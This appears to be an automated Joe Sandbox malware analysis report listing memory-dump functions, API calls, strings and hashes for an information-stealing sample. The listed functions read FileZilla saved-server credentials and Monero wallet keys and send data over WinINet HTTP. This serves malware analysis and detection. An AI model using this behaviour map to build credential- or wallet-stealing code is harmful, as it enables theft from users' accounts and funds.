                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5f057097bb0ddde9b7c16f223c8a34caab719a43a6d549b26fbfd0258503a6ce
                                      • Instruction ID: bed4f390d6e794f19e5b0c68f57a717cb14a62980412bd4435e41678a0026672
                                      • Opcode Fuzzy Hash: 5f057097bb0ddde9b7c16f223c8a34caab719a43a6d549b26fbfd0258503a6ce
                                      • Instruction Fuzzy Hash: 72512AF3B186045BE304AA2DDC8577AB6D6DFC4310F29C53DABC8C7794E93948058696
                                      Function 007E6D0B Relevance: .2, Instructions: 172COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9b1a2ab654f944f9ba81e96f201e8de7c7942d456a19f41500d719d43c140ff8
                                      • Instruction ID: a37a6fa0ac7d04b84a8c913ac8bd1bd2595b2a3577d65735c2850111c3e7a046
                                      • Opcode Fuzzy Hash: 9b1a2ab654f944f9ba81e96f201e8de7c7942d456a19f41500d719d43c140ff8
                                      • Instruction Fuzzy Hash: B05137F39086009FE304AE29DC8576BFBE9EB84710F2B863DDAD483744E6355845C693
                                      Function 00842363 Relevance: .1, Instructions: 143COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1bce5ee2e2da3ea921bd9a2e10f7596d3a8956ae5b3e84b7701949dafea55a74
                                      • Instruction ID: f725b61aff7431c51755901f5cb901ee274ed9dca649d03251761e45a3faddc9
                                      • Opcode Fuzzy Hash: 1bce5ee2e2da3ea921bd9a2e10f7596d3a8956ae5b3e84b7701949dafea55a74
                                      • Instruction Fuzzy Hash: A04124F3E14510ABF718AA29DC4576AB6D6DFD4320F2B843CDB8897784E93988058686
                                      Function 007BC0B9 Relevance: .1, Instructions: 110COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 445025cdba1d0051fb404746735fdc197c3392f185646acb958253fca125b71c
                                      • Instruction ID: 46e9bf5d76fa93b7f22fb4caaed577dd439d5cd7e7fbaea0e929ff11d60d58f8
                                      • Opcode Fuzzy Hash: 445025cdba1d0051fb404746735fdc197c3392f185646acb958253fca125b71c
                                      • Instruction Fuzzy Hash: E9315CF3F045104BE3545D2AEC95767B6C6EBC4320F2B823DDA89DB780D8795C0682D6
                                      Function 009686DA Relevance: .1, Instructions: 106COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 65774c3c86601e7192355e9f2a3eada0acbbde60d24109ba058990b11909ee97
                                      • Instruction ID: b9a0afeef0ab087d64b4cec06bbd786b0aa0e263ffdc293536494053bf4c97b0
                                      • Opcode Fuzzy Hash: 65774c3c86601e7192355e9f2a3eada0acbbde60d24109ba058990b11909ee97
                                      • Instruction Fuzzy Hash: 0331ABB360C704AFE701AE5ADC817BAB7DAEFC4661F16892DD6C0C3B14D67198418693
                                      Function 00539750 Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                      Function 00530250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 00538DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00538E0B
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                        • Part of subcall function 005299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005299EC
                                        • Part of subcall function 005299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00529A11
                                        • Part of subcall function 005299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00529A31
                                        • Part of subcall function 005299C0: ReadFile.KERNEL32(000000FF,?,00000000,0052148F,00000000), ref: 00529A5A
                                        • Part of subcall function 005299C0: LocalFree.KERNEL32(0052148F), ref: 00529A90
                                        • Part of subcall function 005299C0: CloseHandle.KERNEL32(000000FF), ref: 00529A9A
                                        • Part of subcall function 00538E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00538E52
                                      • GetProcessHeap.KERNEL32(00000000,000F423F,00540DBA,00540DB7,00540DB6,00540DB3), ref: 00530362
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00530369
                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 00530385
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00540DB2), ref: 00530393
                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 005303CF
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00540DB2), ref: 005303DD
                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 00530419
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00540DB2), ref: 00530427
                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00530463
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00540DB2), ref: 00530475
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00540DB2), ref: 00530502
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00540DB2), ref: 0053051A
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00540DB2), ref: 00530532
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00540DB2), ref: 0053054A
                                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00530562
                                      • lstrcat.KERNEL32(?,profile: null), ref: 00530571
                                      • lstrcat.KERNEL32(?,url: ), ref: 00530580
                                      • lstrcat.KERNEL32(?,00000000), ref: 00530593
                                      • lstrcat.KERNEL32(?,00541678), ref: 005305A2
                                      • lstrcat.KERNEL32(?,00000000), ref: 005305B5
                                      • lstrcat.KERNEL32(?,0054167C), ref: 005305C4
                                      • lstrcat.KERNEL32(?,login: ), ref: 005305D3
                                      • lstrcat.KERNEL32(?,00000000), ref: 005305E6
                                      • lstrcat.KERNEL32(?,00541688), ref: 005305F5
                                      • lstrcat.KERNEL32(?,password: ), ref: 00530604
                                      • lstrcat.KERNEL32(?,00000000), ref: 00530617
                                      • lstrcat.KERNEL32(?,00541698), ref: 00530626
                                      • lstrcat.KERNEL32(?,0054169C), ref: 00530635
                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00540DB2), ref: 0053068E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                      • API String ID: 1942843190-555421843
                                      • Opcode ID: 1e89ccb4e4ae98ddf07c873500403c9e35c06443a07a8142be7ae1aa880a227e
                                      • Instruction ID: 7e7b60919719e0cb728100c62e0f5e529da0825b3c3de287f295630377906c21
                                      • Opcode Fuzzy Hash: 1e89ccb4e4ae98ddf07c873500403c9e35c06443a07a8142be7ae1aa880a227e
                                      • Instruction Fuzzy Hash: 88D11F72900209ABCB04EBF4DD9AEEEBB38BF94300F548418F142B7195DF74AA45DB65
                                      Function 00525960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                        • Part of subcall function 005247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00524839
                                        • Part of subcall function 005247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00524849
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005259F8
                                      • StrCmpCA.SHLWAPI(?,00F1E748), ref: 00525A13
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00525B93
                                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00F1E778,00000000,?,00F0FA88,00000000,?,00541A1C), ref: 00525E71
                                      • lstrlen.KERNEL32(00000000), ref: 00525E82
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00525E93
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00525E9A
                                      • lstrlen.KERNEL32(00000000), ref: 00525EAF
                                      • lstrlen.KERNEL32(00000000), ref: 00525ED8
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00525EF1
                                      • lstrlen.KERNEL32(00000000,?,?), ref: 00525F1B
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00525F2F
                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00525F4C
                                      • InternetCloseHandle.WININET(00000000), ref: 00525FB0
                                      • InternetCloseHandle.WININET(00000000), ref: 00525FBD
                                      • HttpOpenRequestA.WININET(00000000,00F1E808,?,00F1DF48,00000000,00000000,00400100,00000000), ref: 00525BF8
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                      • InternetCloseHandle.WININET(00000000), ref: 00525FC7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 874700897-2180234286
                                      • Opcode ID: 05423f7edd73ebbbb2dd92fa418bc9f8de13dec81c61079ae067135c5be6defd
                                      • Instruction ID: 6deedd670b95ad533e933340c152e64cb9f2e0687e1561172d24ca2e481cbebe
                                      • Opcode Fuzzy Hash: 05423f7edd73ebbbb2dd92fa418bc9f8de13dec81c61079ae067135c5be6defd
                                      • Instruction Fuzzy Hash: BB120E72820119ABDB15EBA0DC99FEEBB78BF94700F504199F14772091EF702A49CF65
                                      Function 0052CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                        • Part of subcall function 00538B60: GetSystemTime.KERNEL32(00540E1A,00F0FB78,005405AE,?,?,005213F9,?,0000001A,00540E1A,00000000,?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 00538B86
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0052CF83
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0052D0C7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0052D0CE
                                      • lstrcat.KERNEL32(?,00000000), ref: 0052D208
                                      • lstrcat.KERNEL32(?,00541478), ref: 0052D217
                                      • lstrcat.KERNEL32(?,00000000), ref: 0052D22A
                                      • lstrcat.KERNEL32(?,0054147C), ref: 0052D239
                                      • lstrcat.KERNEL32(?,00000000), ref: 0052D24C
                                      • lstrcat.KERNEL32(?,00541480), ref: 0052D25B
                                      • lstrcat.KERNEL32(?,00000000), ref: 0052D26E
                                      • lstrcat.KERNEL32(?,00541484), ref: 0052D27D
                                      • lstrcat.KERNEL32(?,00000000), ref: 0052D290
                                      • lstrcat.KERNEL32(?,00541488), ref: 0052D29F
                                      • lstrcat.KERNEL32(?,00000000), ref: 0052D2B2
                                      • lstrcat.KERNEL32(?,0054148C), ref: 0052D2C1
                                      • lstrcat.KERNEL32(?,00000000), ref: 0052D2D4
                                      • lstrcat.KERNEL32(?,00541490), ref: 0052D2E3
                                        • Part of subcall function 0053A820: lstrlen.KERNEL32(00524F05,?,?,00524F05,00540DDE), ref: 0053A82B
                                        • Part of subcall function 0053A820: lstrcpy.KERNEL32(00540DDE,00000000), ref: 0053A885
                                      • lstrlen.KERNEL32(?), ref: 0052D32A
                                      • lstrlen.KERNEL32(?), ref: 0052D339
                                        • Part of subcall function 0053AA70: StrCmpCA.SHLWAPI(00F197A0,0052A7A7,?,0052A7A7,00F197A0), ref: 0053AA8F
                                      • DeleteFileA.KERNEL32(00000000), ref: 0052D3B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
